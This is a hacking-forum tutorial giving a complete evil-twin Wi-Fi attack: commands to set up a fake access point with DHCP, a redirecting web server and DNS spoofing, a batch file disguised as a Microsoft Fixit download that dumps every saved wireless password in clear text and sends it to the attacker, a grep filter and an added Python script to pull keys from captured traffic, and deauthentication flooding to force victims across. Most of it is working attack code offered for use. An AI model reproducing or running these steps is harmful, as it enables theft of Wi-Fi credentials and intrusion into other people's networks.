[TUT] WPA2 -- Ultimate Fake AP
This is my new spin on an old idea. It shows how to get WPA2 passwords with a Fake AP without asking the user for them: nobody has to type a password into a web page.

I will show how to set up the Fake AP, but that is not my main goal. I will cover things many of you already know, so stay kind to the noobs; hopefully everyone takes something from this. The secret sauce of this tutorial is what happens after the client connects to your Fake AP. Are you ready?

Ultimate Fake AP


We will be using:
  • Backtrack 5r3
  • airbase-ng
  • dhcpd3-server
  • apache2
  • ettercap
  • nano (or another text editor)
  • grep

Step 1: Airbase-ng
A. Boot BackTrack and put your wireless card into monitor mode. Be sure to specify the channel of your target (11 in this example).
airmon-ng start wlan0 11
airodump-ng --channel 11 mon0

B. Now that monitor mode is up (I will assume mon0 is your monitor interface), start airbase-ng. This fake AP is open; it cannot be encrypted. Do NOT change aa:aa:aa:aa:aa:aa to the MAC address of your target access point, but DO write down the target AP MAC and the target client MAC for Step 7 later (both are shown by airodump-ng, which is beyond the scope of this tutorial). DO change --essid to the SSID of your target, and change -c (channel) to match their channel. One thing to keep in mind: a client whose saved profile for that SSID is WPA2 will not normally auto-join an open network of the same name, so the user usually has to pick it from the list themselves. Discussion about this is welcome.
airbase-ng -a aa:aa:aa:aa:aa:aa --essid MYaccessPoint -c 11 mon0

C. Bring up the airbase-ng at0 interface.
ifconfig at0 up

D. Give at0 the IP address that dhcpd.conf (Step 2) will hand out as router and DNS server and that etter.dns (Step 4) points every name at. The address itself is missing from this copy of the post, so just make sure the three places agree.
ifconfig at0 <at0-address>

Step 2: Configure and Start dhcp3

UPDATE: How to install DHCP3 on BT5r3

apt-get install synaptic

Then, in Synaptic:
  • search for dhcp3-common, select it, open Package in the top menu bar and choose Force Version
  • search dhcp3-server, right click and mark for installation
  • search dhcp3-client, right click and mark for installation
  • search python-wicd, right click and mark for REMOVAL
  • search for wicd, right click and mark for installation
  • Apply


A. Edit the dhcpd.conf file so your dhcpd3 server can hand out IP addresses to connecting clients.
nano /etc/dhcp3/dhcpd.conf

B. Once the dhcpd.conf file is open, erase everything in it, then put this in. Replace the bracketed placeholders with the at0 address from Step 1D (as router and DNS server) and a lease range in the same subnet; the actual addresses are not in this copy of the post.
option domain-name-servers <at0-address>;
default-lease-time 600;
max-lease-time 7200;

subnet <subnet> netmask <netmask> {
  option routers <at0-address>;
  range <first-address> <last-address>;   # without a range dhcpd has nothing to hand out
}

[Image: NyEmDW0.jpg]

C. Create a symbolic link to overcome a common problem with dhcpd3 -- "Can't create PID file /var/run/"
ln -s /var/run/dhcp3-server/ /var/run/

D. Start the dhcpd3 server on the at0 interface using the config file you edited above
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Step 3: Configure apache2 webserver
A. Edit a config file to turn on rewrite functionality. This redirects almost any URL, including subdirectories, back to our Fake AP page. Only plain HTTP can land there: nothing is listening on 443 (default-ssl is not enabled), so HTTPS connections are simply refused, and the client would get a certificate error even if something were.
nano /etc/apache2/sites-enabled/000-default

B. Once the 000-default file is open, make the /var/www/ Directory section look like this. Only the three lines marked "Add-->" are new; don't type the marker itself. Take note we are adding a directory called /Fixit as an exception. It is case sensitive; we create it in Step 5 and fill it in Secret Sauce Part 2. The RewriteCond keeps requests already under /Fixit from being rewritten again, so the rule does not loop.
        <Directory /var/www/>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order allow,deny
        allow from all
   Add-->    RewriteEngine On
   Add-->    RewriteCond  %{REQUEST_URI}  !^/Fixit
   Add-->    RewriteRule ^.*$ /Fixit/
        </Directory>

[Image: 1pup8U0.jpg]

C. Start the rewrite mod.
a2enmod rewrite

D. You must restart apache2 to update the config.
/etc/init.d/apache2 restart

Step 4: Ettercap
A. Edit the etter.dns config file so every name the client looks up resolves to our apache2 webserver.
nano /usr/local/share/ettercap/etter.dns

B. Once the etter.dns file is open, erase everything and put this in, with the at0 address from Step 1D in place of the placeholder (the address is missing from this copy of the post):
* A <at0-address>

[Image: 9oWSOwn.jpg]

C. Start ettercap in DNS spoof mode on at0 and pipe it through grep. In text mode (-T) ettercap prints the payload of the traffic it sees, so the client's HTTP request scrolls past, and the regex picks out the profile name (up to 20 characters), the AP authentication type, and the 8-64 character WLAN key from it. --line-buffered keeps grep from sitting on matches while the pipe fills.
ettercap -T -i at0 -P dns_spoof | grep --line-buffered -E -o '<name>[^<]{1,20}</name>|<keyMaterial>[^<]{8,64}</keyMaterial>|<authentication>[^<]{1,11}</authentication>'

Take a break


Step 5: Wrapping UP
A. Make a directory called "Fixit" in /var/www/ (it is case sensitive!).
mkdir /var/www/Fixit

Step 6: Secret Sauce Part 1

The Fixit directory will contain your HTML and files for apache2. In my video I use a custom edited Microsoft "Fixit" page. I removed all the JavaScript and changed a download link and some text. The HTML and image files for the page are in Secret Sauce Part 2 for download. My index.html download link points to my custom file "bla.bat". Bla.bat is not overly complicated, but it is my work. It is nothing but cmd built-ins and netsh, so antivirus has nothing to flag, and any firewall that lets the browser out lets this out: if the web browser works, this will work. What it does: export every saved wireless profile with the key in clear, glue the XML files into one string, and hand that string to Internet Explorer. Because every DNS name resolves to at0, the request IE makes lands on your box and ettercap prints it, which is what the grep in Step 4C is fishing for. One caveat: if the batch file runs without the rights to clear the key, the export still succeeds but keyMaterial comes out as a protected blob, with <protected>true</protected> next to it; that is not the passphrase. If you share this simple code, don't forget where it came from. :blackhat:
bla.bat:
@echo off
cd /d C:\
rem Export every saved WLAN profile to the current folder (C:\) as XML.
rem key=clear writes the PSK in plain text instead of a protected blob.
netsh wlan export profile
netsh wlan export profile key=clear

setlocal enableextensions enabledelayedexpansion
set /a counter=0
set filecontent=
for %%b in (*.xml) do (
    set /a counter=!counter! + 1
    echo %%b
    rem Append every line of this profile to one long string
    for /f "delims=" %%a in ('type "C:\%%b"') do (
        set filecontent=!filecontent!%%a
        rem enable for debug: echo !filecontent!
    )
)

echo --
echo !counter! Network Profiles Found
echo --
echo !filecontent!

rem The next line is platform specific. Sometimes in a diff folder
"c:\Program Files\Internet Explorer\iexplore.exe" "%filecontent%"

Here you can see the index.html file with the download address:

[Image: YKgXn1E.jpg]
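To see exactly what the batch file ships and what the grep in Step 4C is fishing for, here is an added example (my own, not part of the original post or its download): a Python script that parses the WLANProfile XML that `netsh wlan export profile key=clear` writes, and then pulls the same three fields out of a captured HTTP request, URL-decoding it first. Everything in it is constructed: the SSID, key and DPAPI-style blob are made up, and the request is built from the sample XML on the assumption that the browser sends the text as a query string. It also handles the case the page does not mention: an export run without the rights to clear the key, where keyMaterial is a protected blob rather than the passphrase.

```python
"""Added example (not from the original post): parse a netsh WLANProfile export
and recover name / authentication / keyMaterial from a captured HTTP request.
All sample data below is constructed for this example."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import quote_plus, unquote_plus

# Real namespace used by netsh's WLANProfile schema.
WLAN_NS = "{http://www.microsoft.com/networking/WLAN/profile/v1}"

# Constructed sample export: the element layout is netsh's, the values are made up.
SAMPLE_XML = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>MYaccessPoint</name>
  <SSIDConfig>
    <SSID>
      <hex>4D59616363657373506F696E74</hex>
      <name>MYaccessPoint</name>
    </SSID>
  </SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM>
    <security>
      <authEncryption>
        <authentication>WPA2PSK</authentication>
        <encryption>AES</encryption>
        <useOneX>false</useOneX>
      </authEncryption>
      <sharedKey>
        <keyType>passPhrase</keyType>
        <protected>false</protected>
        <keyMaterial>correct horse battery</keyMaterial>
      </sharedKey>
    </security>
  </MSM>
</WLANProfile>
"""

# Same profile as it comes out when the export was not allowed to clear the key:
# keyMaterial is then a DPAPI blob (hex, bound to the exporting machine), not the
# passphrase. The blob bytes here are made up apart from the 8-byte header.
PROTECTED_XML = SAMPLE_XML.replace(
    "<protected>false</protected>", "<protected>true</protected>"
).replace("correct horse battery", "01000000D08C9DDF" + "00" * 40)


def _text(root, path):
    """Text of the first element at PATH (slash-separated, namespace added), or None."""
    el = root.find("/".join(WLAN_NS + step for step in path.split("/")))
    return el.text.strip() if el is not None and el.text else None


def parse_profile(xml_text):
    """Return the fields from one export that matter for reusing the network."""
    root = ET.fromstring(xml_text)
    protected = (_text(root, "MSM/security/sharedKey/protected") or "false") == "true"
    key = _text(root, "MSM/security/sharedKey/keyMaterial")
    return {
        "name": _text(root, "name"),
        "ssid": _text(root, "SSIDConfig/SSID/name"),
        "authentication": _text(root, "MSM/security/authEncryption/authentication"),
        "encryption": _text(root, "MSM/security/authEncryption/encryption"),
        "key_type": _text(root, "MSM/security/sharedKey/keyType"),
        "protected": protected,
        "key_material": key,
        "usable_key": None if protected else key,  # a protected blob is useless off-box
    }


# The Step 4C grep, tightened: [^<] instead of runs of .?, same length bounds.
TAG_RE = re.compile(
    r"<name>(?P<name>[^<]{1,20})</name>"
    r"|<keyMaterial>(?P<keyMaterial>[^<]{8,64})</keyMaterial>"
    r"|<authentication>(?P<authentication>[^<]{1,11})</authentication>"
)


def extract_from_request(raw_request):
    """Pull name / authentication / keyMaterial out of a captured HTTP request.

    Text sent as a query string is percent-encoded on the wire, so '<name>' shows
    up as '%3Cname%3E'; decode before matching. The first <name> is the profile
    name, the second is the SSID, so only the first occurrence is kept."""
    decoded = unquote_plus(raw_request)
    found = {}
    for m in TAG_RE.finditer(decoded):
        for field, value in m.groupdict().items():
            if value is not None and field not in found:
                found[field] = value
    return found


# Constructed capture: a GET carrying the export as a search query string.
SAMPLE_REQUEST = (
    "GET /search?q=" + quote_plus(SAMPLE_XML) + " HTTP/1.1\r\n"
    "Host: www.bing.com\r\n\r\n"
)

if __name__ == "__main__":
    for label, doc in (("clear", SAMPLE_XML), ("protected", PROTECTED_XML)):
        p = parse_profile(doc)
        print(label, p["name"], p["authentication"], p["usable_key"])
    print(extract_from_request(SAMPLE_REQUEST))
```

Run it and it prints the parsed fields for both exports and the dictionary recovered from the request. The point for Step 4C is the decode step: if what ettercap prints is still percent-encoded, the literal `<name>` in the grep never matches and you need to decode first; the protected-export case is why you should check `<protected>` before celebrating a captured keyMaterial.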

Step 6: Secret Sauce Part 2

Here is a zipped Fixit folder made by yours truly. It has everything, so you don't have to do anything but copy it to /var/www/, and anyone who connects to your fake AP will be like "damn, what a fine page". There is no virus, but don't take my word for it. This is what's included:

[Image: neixTKE.jpg]

[Image: 7PwADm3.jpg]

Step 7: Last Step -- Making the Clients Connect
A. Get your target MAC addresses ready as directed in Step 1B. We will use them to deauthenticate the user from their actual access point so that they connect to ours. There are other ways to do this, but that is beyond the scope, yada yada yada.
aireplay-ng --deauth 5000 -c TARGETCLIENTMAC -a TARGETAPMAC mon0

B. Re-run the command when it finishes. The 5000 means send 5000 deauthentication packets. If 5000 is enough to make them connect to our Fake AP, you can stop; if they do not connect, just keep hammering them until they do. mon0 must still be on the target's channel (Step 1A) for the deauth frames to reach them.


August 2013

For those of you who have trouble setting up this attack, Yacked2 has generously provided a video showing the setup as detailed above. Thanks Yacked2.
Sweet tutorial Acroz! Very detailed, going to bookmark this one.
